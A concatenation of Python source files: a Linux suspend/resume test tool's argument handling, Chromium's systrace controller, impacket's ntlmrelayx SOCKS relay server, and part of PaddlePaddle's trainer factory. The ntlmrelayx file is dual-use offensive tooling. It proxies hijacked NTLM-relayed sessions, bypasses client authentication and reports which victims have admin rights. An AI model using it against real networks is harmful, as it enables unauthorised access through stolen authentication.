sysvals.ftracelog = True
elif(arg == '-noturbostat'):
sysvals.tstat = False
elif(arg == '-verbose'):
sysvals.verbose = True
elif(arg == '-proc'):
sysvals.useprocmon = True
elif(arg == '-dev'):
sysvals.usedevsrc = True
elif(arg == '-sync'):
sysvals.sync = True
elif(arg == '-wifi'):
sysvals.wifi = True
elif(arg == '-gzip'):
sysvals.gzip = True
elif(arg == '-info'):
try:
val = next(args)
except:
doError('-info requires one string argument', True)
elif(arg == '-desc'):
try:
val = next(args)
except:
doError('-desc requires one string argument', True)
elif(arg == '-rs'):
try:
val = next(args)
except:
doError('-rs requires "enable" or "disable"', True)
if val.lower() in switchvalues:
if val.lower() in switchoff:
sysvals.rs = -1
else:
sysvals.rs = 1
else:
doError('invalid option: %s, use "enable/disable" or "on/off"' % val, True)
elif(arg == '-display'):
try:
val = next(args)
except:
doError('-display requires an mode value', True)
disopt = ['on', 'off', 'standby', 'suspend']
if val.lower() not in disopt:
doError('valid display mode values are %s' % disopt, True)
sysvals.display = val.lower()
elif(arg == '-maxdepth'):
sysvals.max_graph_depth = getArgInt('-maxdepth', args, 0, 1000)
elif(arg == '-rtcwake'):
try:
val = next(args)
except:
doError('No rtcwake time supplied', True)
if val.lower() in switchoff:
sysvals.rtcwake = False
else:
sysvals.rtcwake = True
sysvals.rtcwaketime = getArgInt('-rtcwake', val, 0, 3600, False)
elif(arg == '-timeprec'):
sysvals.setPrecision(getArgInt('-timeprec', args, 0, 6))
elif(arg == '-mindev'):
sysvals.mindevlen = getArgFloat('-mindev', args, 0.0, 10000.0)
elif(arg == '-mincg'):
sysvals.mincglen = getArgFloat('-mincg', args, 0.0, 10000.0)
elif(arg == '-bufsize'):
sysvals.bufsize = getArgInt('-bufsize', args, 1, 1024*1024*8)
elif(arg == '-cgtest'):
sysvals.cgtest = getArgInt('-cgtest', args, 0, 1)
elif(arg == '-cgphase'):
try:
val = next(args)
except:
doError('No phase name supplied', True)
d = Data(0)
if val not in d.phasedef:
doError('invalid phase --> (%s: %s), valid phases are %s'\
% (arg, val, d.phasedef.keys()), True)
sysvals.cgphase = val
elif(arg == '-cgfilter'):
try:
val = next(args)
except:
doError('No callgraph functions supplied', True)
sysvals.setCallgraphFilter(val)
elif(arg == '-skipkprobe'):
try:
val = next(args)
except:
doError('No kprobe functions supplied', True)
sysvals.skipKprobes(val)
elif(arg == '-cgskip'):
try:
val = next(args)
except:
doError('No file supplied', True)
if val.lower() in switchoff:
sysvals.cgskip = ''
else:
sysvals.cgskip = sysvals.configFile(val)
if(not sysvals.cgskip):
doError('%s does not exist' % sysvals.cgskip)
elif(arg == '-callloop-maxgap'):
sysvals.callloopmaxgap = getArgFloat('-callloop-maxgap', args, 0.0, 1.0)
elif(arg == '-callloop-maxlen'):
sysvals.callloopmaxlen = getArgFloat('-callloop-maxlen', args, 0.0, 1.0)
elif(arg == '-cmd'):
try:
val = next(args)
except:
doError('No command string supplied', True)
sysvals.testcommand = val
sysvals.suspendmode = 'command'
elif(arg == '-expandcg'):
sysvals.cgexp = True
elif(arg == '-srgap'):
sysvals.srgap = 5
elif(arg == '-maxfail'):
sysvals.maxfail = getArgInt('-maxfail', args, 0, 1000000)
elif(arg == '-multi'):
try:
c, d = next(args), next(args)
except:
doError('-multi requires two values', True)
sysvals.multiinit(c, d)
elif(arg == '-o'):
try:
val = next(args)
except:
doError('No subdirectory name supplied', True)
sysvals.outdir = sysvals.setOutputFolder(val)
elif(arg == '-config'):
try:
val = next(args)
except:
doError('No text file supplied', True)
file = sysvals.configFile(val)
if(not file):
doError('%s does not exist' % val)
configFromFile(file)
elif(arg == '-fadd'):
try:
val = next(args)
except:
doError('No text file supplied', True)
file = sysvals.configFile(val)
if(not file):
doError('%s does not exist' % val)
sysvals.addFtraceFilterFunctions(file)
elif(arg == '-dmesg'):
try:
val = next(args)
except:
doError('No dmesg file supplied', True)
sysvals.notestrun = True
sysvals.dmesgfile = val
if(os.path.exists(sysvals.dmesgfile) == False):
doError('%s does not exist' % sysvals.dmesgfile)
elif(arg == '-ftrace'):
try:
val = next(args)
except:
doError('No ftrace file supplied', True)
sysvals.notestrun = True
sysvals.ftracefile = val
if(os.path.exists(sysvals.ftracefile) == False):
doError('%s does not exist' % sysvals.ftracefile)
elif(arg == '-summary'):
try:
val = next(args)
except:
doError('No directory supplied', True)
cmd = 'summary'
sysvals.outdir = val
sysvals.notestrun = True
if(os.path.isdir(val) == False):
doError('%s is not accesible' % val)
elif(arg == '-filter'):
try:
val = next(args)
except:
doError('No devnames supplied', True)
sysvals.setDeviceFilter(val)
elif(arg == '-result'):
try:
val = next(args)
except:
doError('No result file supplied', True)
sysvals.result = val
sysvals.signalHandlerInit()
else:
doError('Invalid argument: '+arg, True)
# compatibility errors
if(sysvals.usecallgraph and sysvals.usedevsrc):
doError('-dev is not compatible with -f')
if(sysvals.usecallgraph and sysvals.useprocmon):
doError('-proc is not compatible with -f')
if sysvals.usecallgraph and sysvals.cgskip:
sysvals.vprint('Using cgskip file: %s' % sysvals.cgskip)
sysvals.setCallgraphBlacklist(sysvals.cgskip)
# callgraph size cannot exceed device size
if sysvals.mincglen < sysvals.mindevlen:
sysvals.mincglen = sysvals.mindevlen
# remove existing buffers before calculating memory
if(sysvals.usecallgraph or sysvals.usedevsrc):
sysvals.fsetVal('16', 'buffer_size_kb')
sysvals.cpuInfo()
# just run a utility command and exit
if(cmd != ''):
ret = 0
if(cmd == 'status'):
if not statusCheck(True):
ret = 1
elif(cmd == 'fpdt'):
if not getFPDT(True):
ret = 1
elif(cmd == 'sysinfo'):
sysvals.printSystemInfo(True)
elif(cmd == 'devinfo'):
deviceInfo()
elif(cmd == 'modes'):
pprint(getModes())
elif(cmd == 'flist'):
sysvals.getFtraceFilterFunctions(True)
elif(cmd == 'flistall'):
sysvals.getFtraceFilterFunctions(False)
elif(cmd == 'summary'):
runSummary(sysvals.outdir, True, genhtml)
elif(cmd in ['xon', 'xoff', 'xstandby', 'xsuspend', 'xinit', 'xreset']):
sysvals.verbose = True
ret = sysvals.displayControl(cmd[1:])
elif(cmd == 'xstat'):
pprint('Display Status: %s' % sysvals.displayControl('stat').upper())
elif(cmd == 'wificheck'):
dev = sysvals.checkWifi()
if dev:
print('%s is connected' % sysvals.wifiDetails(dev))
else:
print('No wifi connection found')
elif(cmd == 'cmdinfo'):
for out in sysvals.cmdinfo(False, True):
print('[%s - %s]\n%s\n' % out)
sys.exit(ret)
# if instructed, re-analyze existing data files
if(sysvals.notestrun):
stamp = rerunTest(sysvals.outdir)
sysvals.outputResult(stamp)
sys.exit(0)
# verify that we can run a test
error = statusCheck()
if(error):
doError(error)
# extract mem/disk extra modes and convert
mode = sysvals.suspendmode
if mode.startswith('mem'):
memmode = mode.split('-', 1)[-1] if '-' in mode else 'deep'
if memmode == 'shallow':
mode = 'standby'
elif memmode == 's2idle':
mode = 'freeze'
else:
mode = 'mem'
sysvals.memmode = memmode
sysvals.suspendmode = mode
if mode.startswith('disk-'):
sysvals.diskmode = mode.split('-', 1)[-1]
sysvals.suspendmode = 'disk'
sysvals.systemInfo(dmidecode(sysvals.mempath))
failcnt, ret = 0, 0
if sysvals.multitest['run']:
# run multiple tests in a separate subdirectory
if not sysvals.outdir:
if 'time' in sysvals.multitest:
s = '-%dm' % sysvals.multitest['time']
else:
s = '-x%d' % sysvals.multitest['count']
sysvals.outdir = datetime.now().strftime('suspend-%y%m%d-%H%M%S'+s)
if not os.path.isdir(sysvals.outdir):
os.makedirs(sysvals.outdir)
sysvals.sudoUserchown(sysvals.outdir)
finish = datetime.now()
if 'time' in sysvals.multitest:
finish += timedelta(minutes=sysvals.multitest['time'])
for i in range(sysvals.multitest['count']):
sysvals.multistat(True, i, finish)
if i != 0 and sysvals.multitest['delay'] > 0:
pprint('Waiting %d seconds...' % (sysvals.multitest['delay']))
time.sleep(sysvals.multitest['delay'])
fmt = 'suspend-%y%m%d-%H%M%S'
sysvals.testdir = os.path.join(sysvals.outdir, datetime.now().strftime(fmt))
ret = runTest(i+1, True)
failcnt = 0 if not ret else failcnt + 1
if sysvals.maxfail > 0 and failcnt >= sysvals.maxfail:
pprint('Maximum fail count of %d reached, aborting multitest' % (sysvals.maxfail))
break
time.sleep(5)
sysvals.resetlog()
sysvals.multistat(False, i, finish)
if 'time' in sysvals.multitest and datetime.now() >= finish:
break
if not sysvals.skiphtml:
runSummary(sysvals.outdir, False, False)
sysvals.sudoUserchown(sysvals.outdir)
else:
if sysvals.outdir:
sysvals.testdir = sysvals.outdir
# run the test in the current directory
ret = runTest()
# reset to default values after testing
if sysvals.display:
sysvals.displayControl('reset')
if sysvals.rs != 0:
sysvals.setRuntimeSuspend(False)
sys.exit(ret)
|
systrace_controller.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import threading
import zlib
from profile_chrome import controllers
from profile_chrome import util
from pylib import cmd_helper
_SYSTRACE_OPTIONS = [
# Compress the trace before sending it over USB.
'-z',
# Use a large trace buffer to increase the polling interval.
'-b', '16384'
]
# Interval in seconds for sampling systrace data.
_SYSTRACE_INTERVAL = 15
_TRACING_ON_PATH = '/sys/kernel/debug/tracing/tracing_on'
class SystraceController(controllers.BaseController):
def __init__(self, device, categories, ring_buffer):
controllers.BaseController.__init__(self)
self._device = device
self._categories = categories
self._ring_buffer = ring_buffer
self._done = threading.Event()
self._thread = None
self._trace_data = None
def __repr__(self):
return 'systrace'
@staticmethod
def GetCategories(device):
return device.RunShellCommand('atrace --list_categories')
def StartTracing(self, _):
self._thread = threading.Thread(target=self._CollectData)
self._thread.start()
def StopTracing(self):
self._done.set()
def PullTrace(self):
self._thread.join()
self._thread = None
if self._trace_data:
output_name = 'systrace-%s' % util.GetTraceTimestamp()
with open(output_name, 'w') as out:
out.write(self._trace_data)
return output_name
def IsTracingOn(self):
result = self._RunAdbShellCommand(['cat', _TRACING_ON_PATH])
return result.strip() == '1'
def _RunAdbShellCommand(self, command):
# We use a separate interface to adb because the one from AndroidCommands
# isn't re-entrant.
# TODO(jbudorick) Look at providing a way to unhandroll this once the
# adb rewrite has fully landed.
device_param = (['-s', str(self._device)] if str(self._device) else [])
cmd = ['adb'] + device_param + ['shell'] + command
return cmd_helper.GetCmdOutput(cmd)
def _RunATraceCommand(self, command):
cmd = ['atrace', '--%s' % command] + _SYSTRACE_OPTIONS + self._categories
return self._RunAdbShellCommand(cmd)
def _ForceStopAtrace(self):
# atrace on pre-M Android devices cannot be stopped asynchronously
# correctly. Use synchronous mode to force stop.
cmd = ['atrace', '-t', '0']
return self._RunAdbShellCommand(cmd)
def _CollectData(self):
trace_data = []
self._RunATraceCommand('async_start')
try:
while not self._done.is_set():
self._done.wait(_SYSTRACE_INTERVAL)
if not self._ring_buffer or self._done.is_set():
trace_data.append(
self._DecodeTraceData(self._RunATraceCommand('async_dump')))
finally:
trace_data.append(
self._DecodeTraceData(self._RunATraceCommand('async_stop')))
if self.IsTracingOn():
self._ForceStopAtrace()
self._trace_data = ''.join([zlib.decompress(d) for d in trace_data])
@staticmethod
def _DecodeTraceData(trace_data):
try:
trace_start = trace_data.index('TRACE:')
except ValueError:
raise RuntimeError('Systrace start marker not found')
trace_data = trace_data[trace_start + 6:]
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
# Skip the initial newline.
return trace_data[1:]
|
socksserver.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SOCKS proxy server/client
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# A simple SOCKS server that proxy connection to relayed connections
#
# ToDo:
# [ ] Handle better the SOCKS specification (RFC1928), e.g. BIND
# [ ] Port handlers should be dynamically subscribed, and coded in another place. This will help coding
# proxies for different protocols (e.g. MSSQL)
import SocketServer
import socket
import time
import logging
from Queue import Queue
from struct import unpack, pack
from threading import Timer, Thread
from nebulousAD.modimpacket import LOG
from nebulousAD.modimpacket.dcerpc.v5.enum import Enum
from nebulousAD.modimpacket.structure import Structure
# Amount of seconds each socks plugin keep alive function will be called
# It is up to each plugin to send the keep alive to the target or not in every hit.
# In some cases (e.g. SMB) it is not needed to send a keep alive every 30 secs.
KEEP_ALIVE_TIMER = 30.0
class enumItems(Enum):
NO_AUTHENTICATION = 0
GSSAPI = 1
USER_PASS = 2
UNACCEPTABLE = 0xFF
class replyField(Enum):
SUCCEEDED = 0
SOCKS_FAILURE = 1
NOT_ALLOWED = 2
NETWORK_UNREACHABLE = 3
HOST_UNREACHABLE = 4
CONNECTION_REFUSED = 5
TTL_EXPIRED = 6
COMMAND_NOT_SUPPORTED = 7
ADDRESS_NOT_SUPPORTED = 8
class ATYP(Enum):
IPv4 = 1
DOMAINNAME = 3
IPv6 = 4
class SOCKS5_GREETINGS(Structure):
structure = (
('VER','B=5'),
#('NMETHODS','B=0'),
('METHODS','B*B'),
)
class SOCKS5_GREETINGS_BACK(Structure):
structure = (
('VER','B=5'),
('METHODS','B=0'),
)
class SOCKS5_REQUEST(Structure):
structure = (
('VER','B=5'),
('CMD','B=0'),
('RSV','B=0'),
('ATYP','B=0'),
('PAYLOAD',':'),
)
class SOCKS5_REPLY(Structure):
structure = (
('VER','B=5'),
('REP','B=5'),
('RSV','B=0'),
('ATYP','B=1'),
('PAYLOAD',':="AAAAA"'),
)
class SOCKS4_REQUEST(Structure):
structure = (
('VER','B=4'),
('CMD','B=0'),
('PORT','>H=0'),
('ADDR','4s="'),
('PAYLOAD',':'),
)
class SOCKS4_REPLY(Structure):
structure = (
('VER','B=0'),
('REP','B=0x5A'),
('RSV','<H=0'),
('RSV','<L=0'),
)
activeConnections = Queue()
# Taken from https://stackoverflow.com/questions/474528/what-is-the-best-way-to-repeatedly-execute-a-function-every-x-seconds-in-python
# Thanks https://stackoverflow.com/users/624066/mestrelion
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.next_call = time.time()
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self.next_call += self.interval
self._timer = Timer(self.next_call - time.time(), self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
# Base class for Relay Socks Servers for different protocols (SMB, MSSQL, etc)
# Besides using this base class you need to define one global variable when
# writing a plugin for socksplugins:
# PLUGIN_CLASS = "<name of the class for the plugin>"
class SocksRelay:
PLUGIN_NAME = 'Base Plugin'
# The plugin scheme, for automatic registration with relay servers
# Should be specified in full caps, e.g. LDAP, HTTPS
PLUGIN_SCHEME = ''
def __init__(self, targetHost, targetPort, socksSocket, activeRelays):
self.targetHost = targetHost
self.targetPort = targetPort
self.socksSocket = socksSocket
self.sessionData = activeRelays['data']
self.username = None
self.clientConnection = None
self.activeRelays = activeRelays
def initConnection(self):
# Here we do whatever is necessary to leave the relay ready for processing incoming connections
raise RuntimeError('Virtual Function')
def skipAuthentication(self):
# Charged of bypassing any authentication attempt from the client
raise RuntimeError('Virtual Function')
def tunnelConnection(self):
# Charged of tunneling the rest of the connection
raise RuntimeError('Virtual Function')
@staticmethod
def getProtocolPort(self):
# Should return the port this relay works against
raise RuntimeError('Virtual Function')
def keepAliveTimer(server):
LOG.debug('KeepAlive Timer reached. Updating connections')
for target in server.activeRelays.keys():
for port in server.activeRelays[target].keys():
# Now cycle through the users
for user in server.activeRelays[target][port].keys():
if user != 'data' and user != 'scheme':
# Let's call the keepAlive method for the handler to keep the connection alive
if server.activeRelays[target][port][user]['inUse'] is False:
LOG.debug('Calling keepAlive() for %s@%s:%s' % (user, target, port))
try:
server.activeRelays[target][port][user]['protocolClient'].keepAlive()
except Exception, e:
LOG.debug('SOCKS: %s' % str(e))
if str(e).find('Broken pipe') >= 0 or str(e).find('reset by peer') >=0 or \
str(e).find('Invalid argument') >= 0 or str(e).find('Server not connected') >=0:
# Connection died, taking out of the active list
del (server.activeRelays[target][port][user])
if len(server.activeRelays[target][port].keys()) == 1:
del (server.activeRelays[target][port])
LOG.debug('Removing active relay for %s@%s:%s' % (user, target, port))
else:
LOG.debug('Skipping %s@%s:%s since it\'s being used at the moment' % (user, target, port))
def activeConnectionsWatcher(server):
while True:
# This call blocks until there is data, so it doesn't loop endlessly
target, port, scheme, userName, client, data = activeConnections.get()
# ToDo: Careful. Dicts are not thread safe right?
if server.activeRelays.has_key(target) is not True:
server.activeRelays[target] = {}
if server.activeRelays[target].has_key(port) is not True:
server.activeRelays[target][port] = {}
if server.activeRelays[target][port].has_key(userName) is not True:
LOG.info('SOCKS: Adding %s@%s(%s) to active SOCKS connection. Enjoy' % (userName, target, port))
server.activeRelays[target][port][userName] = {}
# This is the protocolClient. Needed because we need to access the killConnection from time to time.
# Inside this instance, you have the session attribute pointing to the relayed session.
server.activeRelays[target][port][userName]['protocolClient'] = client
server.activeRelays[target][port][userName]['inUse'] = False
server.activeRelays[target][port][userName]['data'] = data
# Just for the CHALLENGE data, we're storing this general
server.activeRelays[target][port]['data'] = data
# Let's store the protocol scheme, needed be used later when trying to find the right socks relay server to use
server.activeRelays[target][port]['scheme'] = scheme
# Default values in case somebody asks while we're gettting the data
server.activeRelays[target][port][userName]['isAdmin'] = 'N/A'
# Do we have admin access in this connection?
try:
LOG.debug("Checking admin status for user %s" % str(userName))
isAdmin = client.isAdmin()
server.activeRelays[target][port][userName]['isAdmin'] = isAdmin
except Exception as e:
# Method not implemented
server.activeRelays[target][port][userName]['isAdmin'] = 'N/A'
pass
LOG.debug("isAdmin returned: %s" % server.activeRelays[target][port][userName]['isAdmin'])
else:
LOG.info('Relay connection for %s at %s(%d) already exists. Discarding' % (userName, target, port))
client.killConnection()
def webService(server):
from flask import Flask, jsonify
app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route('/')
def index():
print server.activeRelays
return "Relays available: %s!" % (len(server.activeRelays))
@app.route('/ntlmrelayx/api/v1.0/relays', methods=['GET'])
def get_relays():
relays = []
for target in server.activeRelays:
for port in server.activeRelays[target]:
for user in server.activeRelays[target][port]:
if user != 'data' and user != 'scheme':
protocol = server.activeRelays[target][port]['scheme']
isAdmin = server.activeRelays[target][port][user]['isAdmin']
relays.append([protocol, target, user, isAdmin, str(port)])
return jsonify(relays)
@app.route('/ntlmrelayx/api/v1.0/relays', methods=['GET'])
def get_info(relay):
pass
app.run(host='0.0.0.0', port=9090)
class SocksRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.__socksServer = server
self.__ip, self.__port = client_address
self.__connSocket= request
self.__socksVersion = 5
self.targetHost = None
self.targetPort = None
self.__NBSession= None
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
def sendReplyError(self, error = replyField.CONNECTION_REFUSED):
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = error.value
else:
reply = SOCKS4_REPLY()
if error.value != 0:
reply['REP'] = 0x5B
return self.__connSocket.sendall(reply.getData())
def handle(self):
LOG.debug("SOCKS: New Connection from %s(%s)" % (self.__ip, self.__port))
data = self.__connSocket.recv(8192)
grettings = SOCKS5_GREETINGS_BACK(data)
self.__socksVersion = grettings['VER']
if self.__socksVersion == 5:
# We need to answer back with a no authentication response. We're not dealing with auth for now
self.__connSocket.sendall(str(SOCKS5_GREETINGS_BACK()))
data = self.__connSocket.recv(8192)
request = SOCKS5_REQUEST(data)
else:
# We're in version 4, we just received the request
request = SOCKS4_REQUEST(data)
# Let's process the request to extract the target to connect.
# SOCKS5
if self.__socksVersion == 5:
if request['ATYP'] == ATYP.IPv4.value:
self.targetHost = socket.inet_ntoa(request['PAYLOAD'][:4])
self.targetPort = unpack('>H',request['PAYLOAD'][4:])[0]
elif request['ATYP'] == ATYP.DOMAINNAME.value:
hostLength = unpack('!B',request['PAYLOAD'][0])[0]
self.targetHost = request['PAYLOAD'][1:hostLength+1]
self.targetPort = unpack('>H',request['PAYLOAD'][hostLength+1:])[0]
else:
LOG.error('No support for IPv6 yet!')
# SOCKS4
else:
self.targetPort = request['PORT']
# SOCKS4a
if request['ADDR'][:3] == "\x00\x00\x00" and request['ADDR'][3] != "\x00":
nullBytePos = request['PAYLOAD'].find("\x00");
if nullBytePos == -1:
LOG.error('Error while reading SOCKS4a header!')
else:
self.targetHost = request['PAYLOAD'].split('\0', 1)[1][:-1]
else:
self.targetHost = socket.inet_ntoa(request['ADDR'])
LOG.debug('SOCKS: Target is %s(%s)' % (self.targetHost, self.targetPort))
if self.targetPort != 53:
# Do we have an active connection for the target host/port asked?
# Still don't know the username, but it's a start
if self.__socksServer.activeRelays.has_key(self.targetHost):
if self.__socksServer.activeRelays[self.targetHost].has_key(self.targetPort) is not True:
LOG.error('SOCKS: Don\'t have a relay for %s(%s)' % (self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
else:
LOG.error('SOCKS: Don\'t have a relay for %s(%s)' % (self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
# Now let's get into the loops
if self.targetPort == 53:
# Somebody wanting a DNS request. Should we handle this?
s = socket.socket()
try:
LOG.debug('SOCKS: Connecting to %s(%s)' %(self.targetHost, self.targetPort))
s.connect((self.targetHost, self.targetPort))
except Exception, e:
if LOG.level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.error('SOCKS: %s' %str(e))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = replyField.SUCCEEDED.value
addr, port = s.getsockname()
reply['PAYLOAD'] = socket.inet_aton(addr) + pack('>H', port)
else:
reply = SOCKS4_REPLY()
self.__connSocket.sendall(reply.getData())
while True:
try:
data = self.__connSocket.recv(8192)
if data == '':
break
s.sendall(data)
data = s.recv(8192)
self.__connSocket.sendall(data)
except Exception, e:
if LOG.level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.error('SOCKS: ', str(e))
# Let's look if there's a relayed connection for our host/port
scheme = None
if self.__socksServer.activeRelays.has_key(self.targetHost):
if self.__socksServer.activeRelays[self.targetHost].has_key(self.targetPort):
scheme = self.__socksServer.activeRelays[self.targetHost][self.targetPort]['scheme']
if scheme is not None:
LOG.debug('Handler for port %s found %s' % (self.targetPort, self.__socksServer.socksPlugins[scheme]))
relay = self.__socksServer.socksPlugins[scheme](self.targetHost, self.targetPort, self.__connSocket,
self.__socksServer.activeRelays[self.targetHost][self.targetPort])
try:
relay.initConnection()
# Let's answer back saying we've got the connection. Data is fake
if self.__socksVersion == 5:
reply = SOCKS5_REPLY()
reply['REP'] = replyField.SUCCEEDED.value
addr, port = self.__connSocket.getsockname()
reply['PAYLOAD'] = socket.inet_aton(addr) + pack('>H', port)
else:
reply = SOCKS4_REPLY()
self.__connSocket.sendall(reply.getData())
if relay.skipAuthentication() is not True:
# Something didn't go right
# Close the socket
self.__connSocket.close()
return
# Ok, so we have a valid connection to play with. Let's lock it while we use it so the Timer doesn't send a
# keep alive to this one.
self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username]['inUse'] = True
relay.tunnelConnection()
except Exception, e:
if LOG.level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.debug('SOCKS: %s' % str(e))
if str(e).find('Broken pipe') >= 0 or str(e).find('reset by peer') >=0 or \
str(e).find('Invalid argument') >= 0:
# Connection died, taking out of the active list
del(self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username])
if len(self.__socksServer.activeRelays[self.targetHost][self.targetPort].keys()) == 1:
del(self.__socksServer.activeRelays[self.targetHost][self.targetPort])
LOG.debug('Removing active relay for %s@%s:%s' % (relay.username, self.targetHost, self.targetPort))
self.sendReplyError(replyField.CONNECTION_REFUSED)
return
pass
# Freeing up this connection
if relay.username is not None:
self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username]['inUse'] = False
else:
LOG.error('SOCKS: I don\'t have a handler for this port')
LOG.debug('SOCKS: Shutting down connection')
try:
self.sendReplyError(replyField.CONNECTION_REFUSED)
except Exception, e:
LOG.debug('SOCKS END: %s' % str(e))
class SOCKS(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, server_address=('0.0.0.0', 1080), handler_class=SocksRequestHandler):
LOG.info('SOCKS proxy started. Listening at port %d', server_address[1] )
self.activeRelays = {}
self.socksPlugins = {}
self.restAPI = None
self.activeConnectionsWatcher = None
self.supportedSchemes = []
SocketServer.TCPServer.allow_reuse_address = True
SocketServer.TCPServer.__init__(self, server_address, handler_class)
# Let's register the socksplugins plugins we have
from nebulousAD.modimpacket.examples.ntlmrelayx.servers.socksplugins import SOCKS_RELAYS
for relay in SOCKS_RELAYS:
LOG.info('%s loaded..' % relay.PLUGIN_NAME)
self.socksPlugins[relay.PLUGIN_SCHEME] = relay
self.supportedSchemes.append(relay.PLUGIN_SCHEME)
# Let's create a timer to keep the connections up.
self.__timer = RepeatedTimer(KEEP_ALIVE_TIMER, keepAliveTimer, self)
# Let's start our RESTful API
self.restAPI = Thread(target=webService, args=(self, ))
self.restAPI.daemon = True
self.restAPI.start()
# Let's start out worker for active connections
self.activeConnectionsWatcher = Thread(target=activeConnectionsWatcher, args=(self, ))
self.activeConnectionsWatcher.daemon = True
self.activeConnectionsWatcher.start()
def shutdown(self):
self.__timer.stop()
del self.restAPI
del self.activeConnectionsWatcher
return SocketServer.TCPServer.shutdown(self)
if __name__ == '__main__':
from nebulousAD.modimpacket.examples import logger
logger.init()
s = SOCKS()
s.serve_forever()
|
trainer_factory.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
FORMAT = '%(asctime)s-%(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
local_logger = logging.getLogger(__name__)
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer
from .device_worker import Hogwild, DownpourSGD, Section, DownpourSGDOPT
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandler", "FetchHandlerMonitor"]
class TrainerFactory(object):
"""
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
"""
def __init__(self):
pass
def _create_trainer(self, opt_info=None):
trainer = None
device_worker = None
if not opt_info:
# default is MultiTrainer + Hogwild
trainer = MultiTrainer()
device_worker = Hogwild()
trainer._set_device_worker(device_worker)
else:
trainer_class = opt_info["trainer"]
device_worker_class = opt_info["device_worker"]
trainer = globals()[trainer_class]()
device_worker = globals()[device_worker_class]()
# for debug tools
if opt_info is not None:
if opt_info.get("dump_slot") is not None:
trainer._set_dump_slot(opt_info["dump_slot"])
if opt_info.get("mpi_rank") is not None:
trainer._set_mpi_rank(opt_info["mpi_rank"])
if opt_info.get("mpi_size") is not None:
trainer._set_mpi_size(opt_info["mpi_size"])
if opt_info.get("dump_fields") is not None:
trainer._set_dump_fields(opt_info["dump_fields"])
if opt_info.get("dump_fields_path") is not None:
trainer._set_dump_fields_path(opt_info["dump_fields_path"])
if opt_info.get("dump_file_num") is not None:
trainer._set_dump_file_num(opt_info["dump_file_num"])
if opt_info.get("dump_converter") is not None:
trainer._set_dump_converter(opt_info["dump_converter"])
if opt_info.get("dump_param") is not None:
trainer._set_dump_param(opt_info["dump_param"])
if opt_info.get("enable_random_dump") is not None:
trainer._set_enable_random_dump(opt_info[
"enable_random_dump"])
if opt_info.get("dump_interval") is not None:
trainer._set_dump_interval(opt_info["dump_interval"])
if opt_info.get("random_with_lineid") is not None:
trainer._set_random_with_lineid(opt_info[
"random_with_lineid"])
if "fleet_desc" in opt_info:
device_worker._set_fleet_desc(opt_info["fleet_desc"])
trainer._set_fleet_desc(opt_info["fleet_desc"])
if opt_info.get("use_cvm") is not None:
trainer._set_use_cvm(opt_info["use_cvm"])
if opt_info.get("no_cvm") is not None:
trainer._set_no_cvm(opt_info["no_cvm"])
if opt_info.get("scale_datanorm") is not None:
trainer._set_scale_datanorm(opt_info["scale_datanorm"])
if opt_info.get("adjust_ins_weight") is not None:
trainer._set_adjust_ins_weight(opt_info[
"adjust_ins_weight"])
if opt_info.get("copy_table") is not None:
trainer._set_copy_table_config(opt_info["copy_table"])
if opt_info.get("check_nan_var_names") is not None:
trainer._set_check_nan_var_names(opt_info[
"check_nan_var_names"])
if opt_info.get("loss_names") is not None:
trainer._set_loss_names(opt_info["loss_names"])
trainer._set_device_worker(device_worker)
return trainer
class FetchHandlerMonitor(object):
"""
Defination of FetchHandlerMonitor class,
it's for fetch handler.
"""
def __init__(self, scope, handler):
self.fetch_instance = handler
self.fetch_thread = threading.Thread(
target=self.handler_launch_func, args=(scope, self.fetch_instance))
self.running_lock = threading.Lock()
self.running = False
def handler_launch_func(self, scope, handler):
fetch_instance = handler
period_secs = fetch_instance.period_secs
var_name_to_key = {}
for key in fetch_instance.var_dict:
if isinstance(fetch_instance.var_dict[key], Variable):
var_name_to_key[fetch_instance.var_dict[key].name] = key
else:
local_logger.warning("the value of {} is not a Variable".format(
key))
var_name_to_key["None.var"] = key
elapsed_secs = 0
